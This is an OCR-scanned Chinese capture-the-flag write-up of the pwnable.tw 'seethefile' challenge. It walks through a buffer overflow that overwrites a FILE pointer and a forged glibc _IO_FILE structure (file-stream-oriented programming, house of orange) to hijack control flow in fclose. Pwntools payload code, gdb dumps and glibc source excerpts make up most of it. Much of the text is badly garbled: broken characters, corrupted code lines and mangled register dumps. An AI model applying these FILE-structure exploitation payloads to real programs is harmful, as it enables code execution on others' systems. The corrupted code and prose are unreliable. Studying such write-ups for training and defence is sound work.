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seethefile

BEFE : pwnable.tw
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http://pwnable.tw

(> seethefile ./seethefile
e
¢ This is a simple program to open,read,write a file

¢ You can open what you want to see

¢ Can you read everything ?

. Write to screen

[ .

£ . Read
¢ . Close
(

tYour choice :

o XHFTFEECKTNEE » TSGR REET flag
.DSS:0804B080 ; char rilename|[b64]

.bss:0804B080 filename db 40h dup(?)
.bss:0804B080

.bss:0804B0CO public magicbuf
.bss:0804B0CO ; char magicbuf[416]
.bss:0804B0C0O magicbuf db 1AO0h dup(?)
.bss:0804B0CO

.bss:0804B260 public name
.bss:0804B260 name db 20h dup(?)
.bss:0804B260 -—

.bss:0804B280 public fp
.bss:0804B280 ; FILE *fp

.bss:0804B280 f£p dd ?
'bss:0804B280 S~

.bss:0804B280 bss ends

« KRMBEAZRESE nane ZrDmHBZRNETH fp 5t
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def exploit(p):
p.sendlineafter("choice
p.recvuntil("name :")
gdb.attach(p)
payload = "a"*36
p.sendline(payload)

) gdb ./seethefile

(II ”?)
— 0x001b1dbo

— 0Ox00000000
— -
- — Ox00000000
n " 2
— 0x001b1dbo
_’
[carry PARITY adjust zero SIGN trap INTERRUPT direction overflow RESUME

virtualx86 identification]

: 0x002b : 0x002b : Ox0000 . Ox0063 ¢ 0x0023 : 0x002b

(

+0x00:

+0x04: Ox00000000

+0x08: Oxf7fb1000 Ox001b1dbo
+0x0c: Oxf7fb1000O Ox001b1dbo
+0x10: 0x00000000
+0x14:

+0x18:

+0x1c: OxO00000000

Oxf7e5c9fb <fclose+27> Oxf7e5cbad < _I0 _new_fclose+448>
Oxf7e5cafl <fclose+33> eax, DWORD PTR [esi]
Oxf7e5cad3 <fclose+35> ah, 0x20
Oxf7e5caf6 <fclose+38> Oxf7e5cb80 < _I0 new_fclose+416>
Oxf7e5cabc <fclose+44> edx, eax

[

#0] Id 1, Name: "seethefile", , reason: SIGSEGV

#0] Oxf7e5c9f7 — Name: (fp=0x61616161)
#1] 0x8048b14 — Name: ()

fclose+23 MR RBEREEIR » EAY esi = aaaa, ENEH(IBZMNE

LRI, FEANBEM fd A— MM AR — T F 6

DHTIRE
T&F glibc 2.23 B33 Z 10 _new_fclose AJ{E iofclose.c FEFIEN :




# define SHLIB COMPAT(a, b, c) ©

# define |10 new fclose fclose

#Fendif

_I0 new fclose ( IO FILE *fp)

B R MBERN asaa NEGMIE 10_FILE, BREEX:

EEETFH chain



10 FILE
flags;
#define I0 file flz

10

I0 read end;
I0 read base;
I0 write -
I0 i

I0

I0

I0

* I0

* I0
* I0

flags2;

old offset;

#define HAVE COLUMN

cur column;
vtable offset;
shortbuf[1];

* lock;
I0 USE OLD IO

o 3 fp i N EEIEHE
: — Axfbadz2488

KEEEHEGH !



0x804c410:
0x804c420:
0x804c430:
0x804c440:
0x804c450:

0xfbad2488
0x00000000
0x00000000
0x00000000
0x00000000

0x00000000
0x00000000
0x00000000
0xf7fblccoO
0x00000000

0x00000000
0x00000000
0x00000000
0x00000003
0x0804c4a8

0x00000000
0x00000000
0x00000000
0x00000000
oxfFFFFFFf

gef>» x/20wx Oxf7fblcco

0xf7fblccOd <_I0_2_1 stderr_>: 0xfbad2086
0xf7fblcdd < I0 2 1 stderr_+16>:
0xf7fblce® <_I0_2_1_stderr_+32>:
Oxf7fblcfO <_I0_2_ 1 stderr_+48>:
0xf7fb1de® <_I0_2_1_stderr_+64>:

gef>» x/20wx 0xf7fb1d6o

0xf7fb1d60 < _I0_2 1 stdodt™sT 0xfbad2887
0xf7fb1d70 <_I0_2_1_stdout_+16>:
0xf7fb1d80 <_I0_2_1_stdout_+32>:
0xf7fb1d90 <_I0_2_1_stdout_+48>:
0xf7fb1da® <_I0_2_ 1 _stdout_+64>:

gef>» Xx 0x0804c410

0x804c410; 0xfbad2488

gef>» p | I0_list_all

$10 = (sftruct _IO_FILE_plus *) 0x804c410
aaf»

0x00000000

0x00000000
0x00000000
0x00000000
oxffffEEesF

oxf7fbida7

oxf7fbida7
oxf7fbidas
0x00000000
oxfFFfffff

0x00000000
0x00000000
0x00000000
0xf7fb1d6e
0x00000000

oxf7fbida7
oxf7fbida7
0x00000000
oxf7fb15a0
0x0a000000

0x00000000

0x00000000
0x00000000
0x00000002
0xf7fb2864

0x00000000
0x00000000
0x00000000
oxFFFFFFFF

oxf7fbida7

oxf7fbida7
0x00000000
0x00000001
oxf7fb2870

oxf7fbida7
0x00000000
0x00000000
OxXfFffffff

gef» p *(struct IO FILE plus *) 0x804c410

512 = {

file = {
_flags =
10 read ptr
10 read end
_I0 read base =
_I0 write base =
_I0 write ptr
_I0 write _end
_I0 buf base =
_I0 buf end =
_I0 save base =
10 backup base =
10 save end = 0x0,
_markers = 0x0,
_chain =
_fileno = 0x3,
_flags2 = ox0,
_old offset = 0x0,
_cur_column axo,
_vtable offset =
_shortbuf = "",
_lock = 0x804c4a8,
_offset =
_codecvt =
_wide data =
_freeres list =
_freeres_buf = 0x0,
__pads = 0x0,
_mode = 0x0,
_unused2 =

Iy
vtable =

0x0,
0x0,

0x0,
0x0,

0x0,

@xfbad2488,

0x0,
0x0,

0x0,

0x0,

0x0,
0x0,

0x0,

OXFIFfffffffffffff,

0x804c4b4,
0x0,

Oxf7fblccd < I0 2 1 stderr_>,

'\000"' <repeats 39 times=

Oxf7fbbacd® < I0 file jumps=




P TRRXAT R

stderr stdout stdin

B— 1T EFkA _flags, IEFEH _flags BIMTNFETI 4 oxfbad

exploit

BERAGERFR -SRI EMRREN

IEELRE fp BRI 0x0804B260 B1Z FZEE name Y
bss name = 0x0804B260

def exploit(p):
p.sendlineafter("choice :","5")

p.recvuntil("name :")

gdb . attach|(p])]
payload = "a"*32 + p32(bss name)




("2aaa"?)
— 0x001b1dbe

-
— 0x00000000

0x61616161 (" "?)

0xf7dfe700 — [loop detected]

[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 id

cation]
: 0x0000 : 0x002b : 0x0023 : 0x002b : 0x0063 : 0x002b
-_— ]7
oxffffcf8o|+0x00: « Sesp
OxFfffcf84 |+0x04: Ox00000000
oxffffcfg8g|+0x08: Oxf7fb1000 0x001b1dbe
oxffffcf8c|+0x0c: Oxf7fb1000O 0x001b1dbo
Oxffffcfo0|+0x10: 0x00000000
oxffffcfo4|+0x14:
Oxffffcf98|+0x18:
OxFfffcf9c|+0x1c: Ox00000000

0xf7e5ca27 <fclose+71>

AL ER S LI5EAIBIE R DWORD PTR [esi+0x48] 48 edx J9 0, SENETLAMAIE] oxs AR
FEMEE -

AIHIE edx IRE— L
bss name 0804B260
deadbeef 0804B284

exploit(p):
p.sendlineafter("
p.recvuntil("name

gdb.attach(p)

payload = "a"*32 + p32(bss name)

payload += p32(0xdeadbeef) 0"*(0x46 - len(payload) - 4)
payload += p32|(|deadbeef))

IHFEREIR



("aaaa"?)
0x001b1dbe

oxf7fb1066 — 06x001bidbe

— — 0x00000000
0x61616161 (" "?)
oxf7dfe760 — [loop detected]

[carry PARITY adjust ZERO sign trap INTERRUPT direction overflow RESUME virtualx86 identification

0x002b : Ox0063 : 0x0023 : 0x002b : 0x002b : 0x0000
]7
oxffffcf50 : 0xf7fb1000
oxffffcfs54 : 0xf7fb10060O
oxffffcfs58

- 0x001b1dbo « Sesp
-
—

oxffffcfsc : 0xf7fb10@6 — 0x001b1dbe
-
-
-
-

0x001b1dbo

oxffffcf60 : 0x0804b260 0x61616161
oxffffcf64 : 0xf7fb1060 0x001b1dbe
oxffffcfe68
Oxffffcféc

— 0x00000000

0xf7flefb8 <fclose+184> j Oxf7flefe® <_IO0_old_fclose+224>
oxf7flefba <fclose+186> eax, eax

Oxf7flefbc <fclose+188> ecx, Ox1

Oxf7flefcl <fclose+193> DWORD PTR gs:0xc, 0x0
Oxf7flefc9 <fclose+201> j oxf7flefcc <_I0_old_fclose+204>

R edx FFER > DRI EMAEF © _lock FAKE

gef>» p * (struct _IO_FILE_plus *)0x0804B260
51 = {
flle = {
_flags = 0x61616161,
_I0_read_ptr = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0 _read_end = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0_read_base = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0_write_base = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0_write_ptr = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0_write_end = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0_buf_base = 0x61616161 <error: Cannot access memory at address 0x61616161>,
_I0_buf_end = 0x804b260 <name> 'a' <repeats 32 times>, " \262\004\b", <incomplete sequence \336>,
_I0_save_base = Oxdeadbeef <error: Cannot access memory at address Oxdeadbeef>,
_I0_backup_base = 0x0,
_I0_save_end = 0x0,
_markers = 0x0,
_chain = oxo,
_fileno = 0x0,
_flags2 = oxo,
_old_offset = 0x0,
_cur_column = 0x0,
_vtable_offset = 0x84,
shortbuf = "\262",
_lock = 0x804

i
vtable = 0x0

BEERRZAITRIES



gef>» x/101 0xf7flefb5-0x20
0xf7f1ef95 < 10 old_fclose+149>: BYTE PTR [eax],al
0xf7f1ef97 < 10 old fclose+151>: BYTE PTR [ebx-0x17a9f314],al
0xf7f1efo9d < 10 old fclose+157>: dx,eax
0xf7f1ef9e < 10 old_fclose+158>: al,oxf4
0xf7f1efad < I0 old fclose+160>: DWORD PTR [ebx+0x10c48306]
0xf7flefaé <_I0 old_fclose+166>: ah,0x80
oxf7flefa9 <_I0_old_fclose+169>: 3 Oxf7fiefed ~ 10 old fclose+228>
oxf7flefab < I0 old fclose+171>: edx,DWORD PTR [esi+0x48]
Oxf7flefae <_I0_old_fclose+174>: ed U, DWORDPTRUSTOX8
=> Oxf7f1efb5 <_IO _old_fclose+181>: edi,DWORD PTR |edx40x8]
gef>» p Sesi+0x48
$2 = 0x804b2a8
gef>» x 0x804b2a8
0x804b2a8: add al,oxs8
gef>» x/wx 0x804b2a8
0x804b2a8: 0x00000804
gef>» p Sesi
$3 = 0x804b260
gef >

{E1E payload:
Ox0804B260

08048288

exploit(p):
p.sendlineafter("choice

p.recvuntil("name :")

gdb.attach(p)

payload = "a"*32 + p32(bss name)
payload += "\x00"*(0x48 - len(payload))
payload += p32(ptr 2 zero)




- 0x61616161 (" )
- 0xf7dfe700 — [loop detected]

- 0xf7fbi1eee0 — 06x001b1dbe
= — 0x00000000

-
[carry parity ADJUST zero SIGN trap INTERRUPT direction overflow resume virtualx86 identificati
on]
: 0x0063 : 0x002b : 0x002b : Ox0000 : 0x002b : 0x0023
]
oxffffcf54|+0x00: 0xf7fb1000
+0x04:
+0x08: 0xf7fb1000
+0x0c: 0xf7fbiooe
+0x10: 0x0804b260
+0x14: 0xf7dfe700
+0x18:
oxffffcf70|+0x1c: ©0x0804b260

0x001b1dbe « Sesp
0x00000000

0x001b1dbe

0x001b1dbe

0x61616161

oxf7dfe700 — [loop detected]

Liiiliill

0x61616161

0xf7e6891e <_I0_file_close_it+270> push ebx

0xf7e6891f <_IO0_file_close_it+271> call DWORD PTR [eax+0x44]

0xf7e68922 <_I0_file_close_it+274> add esp, 0x10

0xf7e68925 <_I0_file_close_it+277> mov esi, eax

0xf7e68927 <_I0_file_close_it+279> jmp Oxf7e6884f <_I0_new_file_close_it+63>

[#0] Id 1, Name: "seethefile", , reason: BRE T

0x0804b260 0x61616161 (" "?)
0xf7dfe700 0xf7dfe700 — [loop detected]
0x00000000
Oxffffcf60 oxf7fb1000 — 0x001b1dbo
Oxffffcfa8 — 0x00000000
0x00000000
0x00000000
-
: [carry PARITY adjust ZERO sign trap INTERRUPT direction overflow resume virtual
0x0023 : 0x002b : 0x002b : Ox0000 : Ox0063 : 0x002b

+0x00: 0xf7fb1000
+0x04: 0x0804b260
+0x08: 0xf7dfe700
+0x0c:

+0x10: 0x0804b260
+0x14: 0xf7e07bd8
+0x18:

+0x1c: Ox00000000

0x001b1dbo « Sesp
0x61616161
0xf7dfe700 — [loop detected]

0x61616161
0x00004857 ("WH"?)

I T T A A

0xf7e68917 <_I0_file_close_it+263> mov eax,  DWORD PTR [ebx+eax*1+0x94]
0xf7e6891e <_I0_file_close_it+270> push ebx

0xf7e6891f < I0 file close it+271> call DWORD PTR [eax+0x44]

0xf7e68922 <_I10_file_close_1it+274> add esp, 0x10

OK, B&{R#EkT, Al

eax = ebx + eax *x 1 + 0x94 = bss_name + 0 + 0x94



BRAFA TR AR IR E bss_name + 0x94 RARIEMIMIRE eax , HMIEHI call IS

WS R] BAIE S eip:
¥ HERBREEIEIEA func_addr , BAENAIZEXIZICH func_ptr
FF func_ptr — ox44 B A bss_name + 0x94

{&1Epayload, THEIEIpayloadiFeipiRE I oxcafebabe

bss name = 0804B260
ptr 2 zero =
func addr =

func _ptr = bss name + 28

exploit(p):
p.sendlineafter("choice :","5")
p.recvuntil("name :")

gdb.attach|(p)

payload = "a"*28 + p32(func addr) + p32(bss name)
payload += "\x00"*(0x48 - (en(payload))

PEVAGEL! p32(ptr 2 zero)

SEVARETS \x00"*(0x94 - len(payload))

PEVAGED! p32(func ptr - 44)

0x00000000
0x61616161 (" )
0xf7dfe700 — [loop detected]

-
— 0x00000000

[carry parity ADJUST zero SIGN trap INTERRUPT direction overflow RESUME virtualx86
: 0x0023 : 0x002b : 0x002b : Ox0000 : Ox0063 : 0x002b
Oxffffcfd4c|+0x00: « Sesp
Oxffffcf50|+0x04: 0x0804b260
oxffffcf54(+0x08: Oxf7fb1000
Oxffffcf58|+0x0c:
oxffffcf5c|[+0x10: Oxf7fbi1000
Oxffffcf60|+0x14: Oxf7fb1000 0x001b1dbo
oxffffcf64(+0x18: 0x0804b260

0x61616161
oxffffcf68|+0x1c: oxf7dfe700 0xf7dfe700 — [loop detected]

0x61616161
0x001b1dbo
Ox00000000
0x001b1dbo

il

[

Cannot disassemble from $PC
Cannot access memory at address Oxcafebabe

[#0] Id 1, Name: "seethefile", , reason: SIGSEGV

A—MAEE
FENBEMEBRHEE N _chain, XANRMHAKIE?



®A _10_list_all XTHREKR > BEERBDNRFGEAIBANE - BEARBEFIAIE ?

FEglibclRREH#EZE _10_list_all AJLATE genops.c ¥ EIFEEH L MER TIZEMIREIRE

void _I0_link_in (struct _IO_FILE_plus xfp)
void _I0 _un_link (struct _IO_FILE_plus *fp)
int _I0 flush_all_lockp (int do_lock)

ErRER=TRE -
5 ia fEROfCBan T
~I0 flush all lockp (int do lock)

result = 0;
I0 FILE *fp;
i last stamp;
last stamp = IO list all stamp;
fp = (IO FILE *) I0 list all;
while (fp != | L)
{
run fp = fp;
if (((fp-> mode <= 0 &&
fp-> I0 write ptr > fp-> I0 write bas
_I0 OVERFLOW (fp, EOF) == EOF)
result = EOF;
run fp = NULL;
fp = fp-> chain;
}
return result;

SORISYOHOAEF TR > (838 _T0_list_all 50K > WRTBURE fp AERMLL -

2R ECIAEFE _10_flush_all_lockp {E abort.c FIZE fflush FTMAIBEESENEF » KK
¥ abort() WA -

T EMREIRER - /5 assert() A °
ERER :

assert() = __assert_fail() > __assert_fail_base() * abort() » _IO_flush_all_lockp()

IERT AR T _10_flush_all_lockp HIIRIZRIEE S > B1F



glibc abort
exit()

main return

A B SRSt SHE -

It > BAIXZ T AR
fB3& _10_list_all
B EMS AR assert() MM _10_flush_all_lockp €45 fp AFAIFRHEARI I
B _10_flush_all_lockp 54 E&PEAOLMART 9 —MRAAIREER _10_ovERFLOW 3ABIFIFRRK
ES

ps: AmRiGwindows TR AR QI BT AL 5 5 SRTIR FHITRE -

LR RIERNE R IERVIRIF > I FTIN B AR HERAO N 7 2 AR BER -

Glibc abort routine

malloc_printerr

l

_libc_message(error msg)

l

JUMP_FIELD(_IO_overflow_t,
__overflow)

l

_10_flush_all_lockp \

If the condition is satisfied

(from:angelboy’s topic on HITB SG2018)



#define JUMP_FIELD(TYPE, NAME) TYPE NAME
//JUMP_FIELD(_IO0 overflow_t, __overflow)
//_I0_overflow_t __overflow()
(k(struct _I0_jump_t sx)
((void %) & IO _JUMPS_FILE_plus (fp) + (fp)->_vtable_offset))

//genops.c
int __overflow (_IO_FILE xf, int ch)
{
/* This is a single-byte stream. */
if (f->_mode == 0)
_I0_fwide (f, -1);
return _I0O_OVERFLOW (f, ch);
b

libc_hidden_def (__overflow)

Yfsop HEEMRIE BRI AR » 1ZF B HEXN house of orange

ELAth

EETENR > glibc 2.24FF8 » RINT X _10_file->vtable RUIE » N EBEMRERIZSE
TESTIZNE -

Mglibc2.26FFA > malloc_printerr() #FRT _10_flush_all_lockp() BR%X > house of
orange /735K » (BREfsoplhrl@EI Hith B S S A REAEIRAA -
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